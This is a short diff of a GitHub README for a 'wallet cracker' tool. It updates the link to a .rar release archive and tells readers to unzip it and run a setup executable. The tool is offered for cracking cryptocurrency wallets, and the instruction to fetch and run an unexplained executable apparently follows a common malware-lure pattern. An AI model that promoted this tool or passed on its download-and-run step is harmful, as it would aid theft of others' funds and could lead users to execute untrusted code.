abbasforghani/Mont3an-Wallet-Cracker/README.md

 </p>
  <h2 >How to use</h2>

-Go to the releases  or <a href="https://github.com/M0nTan3/Mont3an-Wallet-Cracker/releases/mont3an wallet cracker setup.rar" target="_blank">click here</a>
+Go to the releases  or <a href="https://github.com/M0nTan3/Mont3an-Wallet-Cracker/releases/download/file/mont3an.wallet.cracker.setup.rar" target="_blank">click here</a>
 Unzip and run mont3an wallet cracker setup.exe

 <h2>Requirements</h2>